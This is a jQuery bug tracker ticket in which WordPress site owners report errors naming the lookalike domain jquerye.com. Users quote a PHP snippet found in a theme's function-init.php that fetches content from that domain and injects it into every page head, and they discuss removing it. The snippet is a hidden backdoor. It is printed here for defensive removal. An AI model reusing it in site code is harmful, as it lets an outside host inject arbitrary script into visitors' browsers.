#13299 closed bug (duplicate)
recieving error about jquery suddenly
Reported by: | Owned by: | ||
---|---|---|---|
Priority: | undecided | Milestone: | None |
Component: | unfiled | Version: | git |
Keywords: | Cc: | ||
Blocked by: | Blocking: |
Description
HEllo can you resolve this please?
404 Not Found
The server can not find the requested page:
www.jquerye.com/jquery-1.6.3.min.js (port 80)
Please forward this error screen to www.jquerye.com's WebMaster. Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.jquerye.com Port 80
It seems it has nothing to do with my site. thanks
Change History (17)
comment:1 Changed 8 years ago by
Resolution: | → duplicate |
---|---|
Status: | new → closed |
comment:2 follow-up: 3 Changed 8 years ago by
Hellow, I'm having the same problem, and i can't find it in the website, thanks for the help
comment:3 follow-up: 4 Changed 8 years ago by
Replying to mario:
Hellow, I'm having the same problem, and i can't find it in the website, thanks for the help
Hello, i got my problem solved, it was due to wrong coding of template. hussy.plus@… contact me here i will get you solved with it.
comment:4 Changed 8 years ago by
comment:6 follow-up: 7 Changed 8 years ago by
What's happening is you're using a fake site. Perhaps you're all victims of a security vulnerability, but this problem is not related to any jQuery servers and there is nothing we can do about this. You need to fix your code to point to a legitimate source, such as the jQuery, Google, or Microsoft CDNs (or host the file yourself).
comment:7 Changed 8 years ago by
Can you please tell me ! How to figure this out.
Any help wud be greatfull
comment:8 follow-up: 17 Changed 8 years ago by
NO actually we all are using same theme what i have discovered so far. BTW go to your theme folder and find a folder includes. Find function-init.php and remove that code if it looks like:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
comment:9 Changed 8 years ago by
This actually worked...I just did it and it fix the problem. Thanks man.
comment:10 Changed 8 years ago by
im using wordpress..how can i remove it? any idea? should i update my wordpress version?
comment:11 Changed 8 years ago by
actually, removing it, causes other problems...back to trying to figure it out.
comment:12 follow-up: 15 Changed 8 years ago by
Worked for me ! I can help those find that line in the theme !
Mention your theme name !
comment:13 Changed 8 years ago by
LOL My pleasure guys, iyannanaman It doesn't matter what WP version are you using. Its the theme that is culprit. Something is fishy with it. You can try finding those lines and remove it then tell us.
comment:14 Changed 8 years ago by
For us it is having no problem at all! For those who are unsuccessful with it , try deactivating their plug ins one by one. Sometimes a plug maybe calling a function that doesn't suit your theme.
comment:15 Changed 8 years ago by
Replying to yeshu.aryan@…:
Worked for me ! I can help those find that line in the theme !
Mention your theme name !
My Theme is zantam's Progessio
comment:16 Changed 8 years ago by
I just want to know, do we remove the entire code? or just a pottion of this code ?
?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = " http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
Duplicate of #13297.